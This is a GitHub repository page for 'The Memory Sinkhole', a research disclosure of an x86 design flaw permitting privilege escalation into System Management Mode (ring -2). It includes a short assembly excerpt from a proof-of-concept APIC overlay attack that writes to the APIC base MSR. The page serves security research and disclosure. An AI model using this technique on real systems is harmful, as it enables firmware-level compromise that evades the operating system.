Skip to content

xoreaxeaxeax/sinkhole

master
Switch branches/tags
Code
This branch is up to date with Battelle/sinkhole:master.

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
Dec 31, 2015
Dec 31, 2015

The Memory Sinkhole

: An x86 design flaw allowing ring -2 privilege escalation.

Overview

The memory sinkhole is a design flaw in x86 processors that allows code to escalate privileges into ring -2 (System Management Mode).

wbinvd
mov dword [0x10014], 0xffcf9aff
mov dword [0x10010], 0x9fa2ffff

mov eax, 0x1f5ff900
mov edx, 0
mov ecx, 0x1b
wrmsr

jmp $

The proof of concept APIC overlay attack illustrates one approach for using the flaw to elevate privileges.

References

The technique is outlined in detail in the Black Hat presentation.

Slides from the presentation are provided here.

The exploit white paper provides a technical overview of the flaw and exploitation approach.

Author

The Memory Sinkhole is a research effort from Christopher Domas (@xoreaxeaxeax).

About

Architectural privilege escalation on x86

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Assembly 100.0%